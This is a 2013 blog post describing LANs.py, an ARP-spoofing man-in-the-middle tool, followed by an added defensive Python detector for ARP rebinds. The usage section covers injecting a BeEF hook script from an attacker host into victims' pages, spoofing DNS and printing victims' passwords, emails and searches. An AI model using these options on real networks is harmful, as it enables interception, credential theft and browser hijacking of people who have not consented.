Wednesday, 13 November 2013

[LANs.py] Capture and inject traffic on LAN

Multithreaded, asynchronous packet parsing/injecting ARP spoofer.

Individually ARP spoofs the target box, router and DNS server if necessary. Does not poison anyone else on the network. Displays all the most interesting bits of their traffic and can inject custom HTML into pages they visit. Cleans up after itself.

Prereqs: Linux, scapy, python nfqueue-bindings 0.4.3+, aircrack-ng, python twisted, BeEF (optional), and a wireless card capable of promiscuous mode if you don't use the -ip option

Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.


All options:
python LANs.py -h
-b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, e.g. -b http://192.168.1.10:3000/hook.js
-c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
-d: open an xterm with driftnet to see all images they view
-dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
-u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg URLs since they spam the output and are uninteresting
-i INTERFACE: specify interface; default is first interface in ip route, e.g. -i wlan0
-ip: target this IP address
-n: performs a quick nmap scan of the target
-na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
-p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
-pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
-rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
-rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
-v: show verbose URLs which do not truncate at 150 characters like -u

Cleans the following on Ctrl-C:
--Turn off IP forwarding
--Flush iptables firewall
--Individually restore each machine's ARP table
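
Seen from the monitoring side, both the per-host poisoning and the Ctrl-C restore described above appear as IP-to-MAC rebinds in observed ARP replies. The detector below is an added example, not part of LANs.py or the original post; the router IP 192.168.0.1, every MAC address and the function names are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample of observed ARP replies: (time_s, sender_ip, sender_mac).
# 192.168.0.5 (attacker) and 192.168.0.10 (victim) are the post's addresses;
# the router IP 192.168.0.1 and all MACs are made up for this example.
SAMPLE_ARP_REPLIES = [
    (0.0,  "192.168.0.1",  "aa:aa:aa:00:00:01"),  # router, real MAC
    (0.5,  "192.168.0.10", "aa:aa:aa:00:00:10"),  # victim, real MAC
    (1.0,  "192.168.0.5",  "aa:aa:aa:00:00:05"),  # attacker, own MAC
    (5.0,  "192.168.0.1",  "aa:aa:aa:00:00:05"),  # router IP now at attacker MAC
    (5.1,  "192.168.0.10", "aa:aa:aa:00:00:05"),  # victim IP now at attacker MAC
    (60.0, "192.168.0.1",  "aa:aa:aa:00:00:01"),  # ARP table restored on exit
    (60.1, "192.168.0.10", "aa:aa:aa:00:00:10"),
]

def detect_arp_spoofing(replies, gateway_ip):
    """Flag IP->MAC rebinds and MACs that claim several IPs at once."""
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # IPs each MAC currently claims
    alerts = []
    for ts, ip, mac in sorted(replies):
        old = ip_to_mac.get(ip)
        if old is not None and old != mac:
            mac_to_ips[old].discard(ip)
            alerts.append({"kind": "rebind", "time": ts, "ip": ip,
                           "old_mac": old, "new_mac": mac,
                           "gateway": ip == gateway_ip})
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            # Multi-homed hosts and proxy ARP also trigger this; the
            # gateway flag marks the case that matters most.
            alerts.append({"kind": "multi_ip", "time": ts, "mac": mac,
                           "ips": sorted(mac_to_ips[mac]),
                           "gateway": gateway_ip in mac_to_ips[mac]})
    return alerts

def suspect_macs(alerts):
    """MACs that held the gateway IP together with another address."""
    return sorted({a["mac"] for a in alerts
                   if a["kind"] == "multi_ip" and a["gateway"]})

if __name__ == "__main__":
    found = detect_arp_spoofing(SAMPLE_ARP_REPLIES, "192.168.0.1")
    for alert in found:
        print(alert)
    print("suspects:", suspect_macs(found))
```

A rebind alone can be benign (DHCP lease reuse, a replaced NIC), so the gateway flag and the multi_ip alerts are the ones to triage first.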

